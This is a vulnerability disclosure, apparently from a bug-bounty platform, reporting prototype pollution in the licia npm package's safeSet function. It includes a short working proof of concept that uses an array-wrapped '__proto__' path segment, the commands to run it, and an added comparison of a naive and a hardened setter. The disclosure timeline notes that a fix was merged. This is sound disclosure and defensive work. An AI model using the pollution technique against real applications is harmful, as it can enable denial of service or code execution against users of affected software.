Prototype Pollution in liriliri/licia

Valid

Reported on

Sep 1st 2021


✍️ Description

The licia package is vulnerable to Prototype Pollution. The safeSet function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, adding a new property or modifying an existing one on all objects.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var licia = require("licia")
let obj = {}
console.log("Before: " + {}.polluted)
licia.safeSet(obj, [['__proto__'], 'polluted'], 'Yes! Its Polluted')
console.log("After: " + {}.polluted)

Execute the following commands in the terminal:

npm i licia # Install affected module
node poc.js #  Run the PoC

Check the Output:

Before: undefined
After: Yes! Its Polluted

💥 Impact

It may lead to Information Disclosure/DoS/RCE.
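
The PoC path wraps `__proto__` in an array, so a setter that only compares path segments to the string `'__proto__'` does not catch it. The added example below (not licia's code or its fix; `naiveSet`, `hardenedSet` and `demo` are hypothetical names, and the naive check is an assumed pattern for illustration) puts such a setter beside one that rejects non-string segments before writing anything:

```javascript
// Added example: hypothetical helpers, not taken from licia.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// Naive setter (assumed pattern): === only matches string keys, so the segment
// ['__proto__'] passes the check and is coerced to "__proto__" on property access.
function naiveSet(obj, path, val) {
  const keys = path.slice();
  const last = keys.pop();
  for (const key of keys) {
    if (key === '__proto__') return false; // missed for non-string segments
    if (typeof obj[key] !== 'object' || obj[key] === null) obj[key] = {};
    obj = obj[key];
  }
  obj[last] = val;
  return true;
}

// Hardened setter: validate every segment before any write, compare the
// normalised string against the blocklist, descend through own properties only.
function hardenedSet(obj, path, val) {
  if (!Array.isArray(path) || path.length === 0) return false;
  const keys = [];
  for (const seg of path) {
    if (typeof seg !== 'string' && typeof seg !== 'number') return false;
    const key = String(seg);
    if (BLOCKED.has(key)) return false;
    keys.push(key);
  }
  const last = keys.pop();
  for (const key of keys) {
    const own = Object.prototype.hasOwnProperty.call(obj, key);
    if (!own || typeof obj[key] !== 'object' || obj[key] === null) obj[key] = {};
    obj = obj[key];
  }
  obj[last] = val;
  return true;
}

// Runs both setters on the page's PoC path and reports whether
// Object.prototype changed; removes the test property afterwards.
function demo() {
  const path = [['__proto__'], 'polluted'];
  const naiveOk = naiveSet({}, path, 'x');
  const naivePolluted = {}.polluted === 'x';
  delete Object.prototype.polluted;
  const hardOk = hardenedSet({}, path, 'x');
  const hardPolluted = {}.polluted !== undefined;
  return { naiveOk, naivePolluted, hardOk, hardPolluted };
}
console.log(demo());
```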

We have contacted a member of the liriliri/licia team and are waiting to hear back (3 months ago)
ready-research submitted a (3 months ago)
RedHoodSu confirmed that a fix has been merged on 10006a (2 months ago)
RedHoodSu has been awarded the fix bounty